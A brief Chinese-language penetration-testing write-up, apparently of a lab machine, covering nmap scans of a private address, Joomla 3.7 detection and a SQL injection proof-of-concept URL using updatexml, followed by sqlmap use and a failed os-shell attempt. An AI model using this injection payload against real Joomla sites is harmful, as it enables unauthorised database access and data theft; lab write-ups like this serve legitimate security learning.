1.日常扫描
nmap -sP -PI 192.168.2.0/24 -T4
是134这个地址
nmap -A -p- 192.168.2.134
2.joomla
1)版本扫描
joomla 3.7这个版本有个sql注入漏洞
poc
/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,user()),1)
2)漏洞确认
上sqlmap
探测到是dba,试试os-shell
不行,害
跑了下,注射到字段,出不来字段名,有点蒙逼
来个好人救救可怜的博主吧,害